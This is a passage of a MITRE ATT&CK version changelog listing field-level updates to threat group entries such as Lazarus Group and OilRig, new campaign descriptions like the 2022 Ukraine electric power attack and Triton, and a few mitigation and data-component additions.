>Entertainment as part of a campaign named Operation Blockbus>Entertainment as part of a campaign named Operation Blockbus
>ter by Novetta. Malware used by [Lazarus Group](https://atta>ter by Novetta. Malware used by [Lazarus Group](https://atta
>ck.mitre.org/groups/G0032) correlates to other reported camp>ck.mitre.org/groups/G0032) correlates to other reported camp
>aigns, including Operation Flame, Operation 1Mission, Operat>aigns, including Operation Flame, Operation 1Mission, Operat
>ion Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novett>ion Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta
>a Blockbuster)  North Korean group definitions are known to > Blockbuster)  North Korean group definitions are known to h
>have significant overlap, and some security researchers repo>ave significant overlap, and some security researchers repor
>rt all North Korean state-sponsored cyber activity under the>t all North Korean state-sponsored cyber activity under the 
> name [Lazarus Group](https://attack.mitre.org/groups/G0032)>name [Lazarus Group](https://attack.mitre.org/groups/G0032) 
> instead of tracking clusters or subgroups, such as [Andarie>instead of tracking clusters or subgroups, such as [Andariel
>l](https://attack.mitre.org/groups/G0138), [APT37](https://a>](https://attack.mitre.org/groups/G0138), [APT37](https://at
>ttack.mitre.org/groups/G0067), [APT38](https://attack.mitre.>tack.mitre.org/groups/G0067), [APT38](https://attack.mitre.o
>org/groups/G0082), and [Kimsuky](https://attack.mitre.org/gr>rg/groups/G0082), and [Kimsuky](https://attack.mitre.org/gro
>oups/G0094).   >ups/G0094).   
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 19:01:41.451000+00:002024-04-11 16:06:34.699000+00:00
description[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.24.0
x_mitre_contributors[1]Dragos Threat IntelligenceDragos Threat Intelligence
iterable_item_added
STIX FieldOld valueNew Value
aliasesDiamond Sleet
external_references{'source_name': 'Diamond Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0049] OilRig

Current version: 4.0

Version changed from: 3.1 → 4.0


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of sectors, including financial, government>rgeted a variety of sectors, including financial, government
>, energy, chemical, and telecommunications. It appears the g>, energy, chemical, and telecommunications. It appears the g
>roup carries out supply chain attacks, leveraging the trust >roup carries out supply chain attacks, leveraging the trust 
>relationship between organizations to attack their primary t>relationship between organizations to attack their primary t
>argets. FireEye assesses that the group works on behalf of t>argets. The group works on behalf of the Iranian government 
>he Iranian government based on infrastructure details that c>based on infrastructure details that contain references to I
>ontain references to Iran, use of Iranian infrastructure, an>ran, use of Iranian infrastructure, and targeting that align
>d targeting that aligns with nation-state interests.(Citatio>s with nation-state interests.(Citation: FireEye APT34 Dec 2
>n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja>017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearS
>n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo >ky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Cit
>Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)>ation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Pl
>(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGE>aybook 2023)(Citation: Unit 42 QUADAGENT July 2018)
>NT July 2018) 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-02-06 20:58:52.317000+00:002024-04-11 16:06:34.698000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.14.0
x_mitre_contributors[2]Dragos Threat IntelligenceDragos Threat Intelligence
iterable_item_added
STIX FieldOld valueNew Value
aliasesHazel Sandstorm
aliasesEUROPIUM
external_references{'source_name': 'Hazel Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'EUROPIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0034] Sandworm Team

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-06 14:13:06.011000+00:002024-04-06 19:05:38.712000+00:00
x_mitre_version3.14.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSeashell Blizzard
aliasesFROZENBARENTS
external_references{'source_name': 'FROZENBARENTS', 'description': '(Citation: Leonard TAG 2023)'}
external_references{'source_name': 'Seashell Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0102] Wizard Spider

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-12 14:35:52.920000+00:002024-04-03 20:21:34.872000+00:00
external_references[7]['description'](Citation: Secureworks Gold Blackburn Mar 2022)(Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesDEV-0193
external_references{'source_name': 'DEV-0193', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
Minor Version Changes

[G1001] HEXANE

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 04:43:59.082000+00:002024-02-09 19:27:00.371000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[G0088] TEMP.Veles

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-11-30 22:46:40.135000+00:002024-04-17 16:13:43.697000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
x_mitre_contributors[0]Dragos Threat IntelligenceDragos Threat Intelligence

Campaigns

enterprise-attack

New Campaigns

[C0034] 2022 Ukraine Electric Power Attack

Current version: 1.0

Description: The [2022 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0034) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign that used a combination of GOGETTER, Neo-REGEORG, [CaddyWiper](https://attack.mitre.org/software/S0693), and living of the land (LotL) techniques to gain access to a Ukrainian electric utility to send unauthorized commands from their SCADA system.(Citation: Mandiant-Sandworm-Ukraine-2022)(Citation: Dragos-Sandworm-Ukraine-2022)


[C0032] C0032

Current version: 1.0

Description: [C0032](https://attack.mitre.org/campaigns/C0032) was an extended campaign suspected to involve the [Triton](https://attack.mitre.org/software/S1009) adversaries with related capabilities and techniques focused on gaining a foothold within IT environments. This campaign occurred in 2019 and was distinctly different from the [Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030).(Citation: FireEye TRITON 2019)


[C0033] C0033

Current version: 1.0

Description: [C0033](https://attack.mitre.org/campaigns/C0033) was a [PROMETHIUM](https://attack.mitre.org/groups/G0056) campaign during which they used [StrongPity](https://attack.mitre.org/software/S0491) to target Android users. [C0033](https://attack.mitre.org/campaigns/C0033) was the first publicly documented mobile campaign for [PROMETHIUM](https://attack.mitre.org/groups/G0056), who previously used Windows-based techniques.(Citation: welivesec_strongpity)


[C0029] Cutting Edge

Current version: 1.0

Description: [Cutting Edge](https://attack.mitre.org/campaigns/C0029) was a campaign conducted by suspected China-nexus espionage actors, variously identified as UNC5221/UTA0178 and UNC5325, that began as early as December 2023 with the exploitation of zero-day vulnerabilities in Ivanti Connect Secure (previously Pulse Secure) VPN appliances. [Cutting Edge](https://attack.mitre.org/campaigns/C0029) targeted the U.S. defense industrial base and multiple sectors globally including telecommunications, financial, aerospace, and technology. [Cutting Edge](https://attack.mitre.org/campaigns/C0029) featured the use of defense evasion and living-off-the-land (LoTL) techniques along with the deployment of web shells and other custom malware.(Citation: Mandiant Cutting Edge January 2024)(Citation: Volexity Ivanti Zero-Day Exploitation January 2024)(Citation: Volexity Ivanti Global Exploitation January 2024)(Citation: Mandiant Cutting Edge Part 2 January 2024)(Citation: Mandiant Cutting Edge Part 3 February 2024)


[C0030] Triton Safety Instrumented System Attack

Current version: 1.0

Description: [Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)

Minor Version Changes

[C0002] Night Dragon

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-22 20:45:42.479000+00:002024-04-11 00:36:23.822000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

[C0022] Operation Dream Job

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-27 20:12:54.984000+00:002024-04-11 00:31:21.576000+00:00
x_mitre_version1.11.2

[C0016] Operation Dust Storm

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 21:05:22.490000+00:002024-04-11 00:30:42.003000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

[C0006] Operation Honeybee

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 17:57:06.034000+00:002024-04-11 00:30:09.195000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

[C0005] Operation Spalax

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 13:06:44.395000+00:002024-04-11 00:29:32.199000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

mobile-attack

New Campaigns

[C0033] C0033

Current version: 1.0

Description: [C0033](https://attack.mitre.org/campaigns/C0033) was a [PROMETHIUM](https://attack.mitre.org/groups/G0056) campaign during which they used [StrongPity](https://attack.mitre.org/software/S0491) to target Android users. [C0033](https://attack.mitre.org/campaigns/C0033) was the first publicly documented mobile campaign for [PROMETHIUM](https://attack.mitre.org/groups/G0056), who previously used Windows-based techniques.(Citation: welivesec_strongpity)

Minor Version Changes

[C0016] Operation Dust Storm

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 21:05:22.490000+00:002024-04-11 00:30:42.003000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

ics-attack

New Campaigns

[C0034] 2022 Ukraine Electric Power Attack

Current version: 1.0

Description: The [2022 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0034) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign that used a combination of GOGETTER, Neo-REGEORG, [CaddyWiper](https://attack.mitre.org/software/S0693), and living of the land (LotL) techniques to gain access to a Ukrainian electric utility to send unauthorized commands from their SCADA system.(Citation: Mandiant-Sandworm-Ukraine-2022)(Citation: Dragos-Sandworm-Ukraine-2022)


[C0030] Triton Safety Instrumented System Attack

Current version: 1.0

Description: [Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)


[C0031] Unitronics Defacement Campaign

Current version: 1.0

Description: The [Unitronics Defacement Campaign](https://attack.mitre.org/campaigns/C0031) was a collection of intrusions across multiple sectors by the [CyberAv3ngers](https://attack.mitre.org/groups/G1027), where threat actors engaged in a seemingly opportunistic and global targeting and defacement of Unitronics Vision Series [Programmable Logic Controller (PLC)](https://attack.mitre.org/assets/A0003) with [Human-Machine Interface (HMI)](https://attack.mitre.org/assets/A0002). The sectors that these PLCs can be commonly found in are water and wastewater, energy, food and beverage manufacturing, and healthcare. The most notable feature of this attack was the defacement of the PLCs' HMIs.(Citation: CISA AA23-335A IRGC-Affiliated December 2023)(Citation: Frank Bajak and Marc Levy December 2023)

Mitigations

enterprise-attack

Minor Version Changes

[M1054] Software Configuration

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 13:11:09.471000+00:002023-12-26 19:17:13.293000+00:00
x_mitre_version1.11.2

mobile-attack

New Mitigations

[M1059] Do Not Mitigate

Current version: 1.0

Description: This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.

Data Components

mobile-attack

New Data Components

Application Vetting: Application Assets

Current version: 1.0

Description: Additional assets included with an application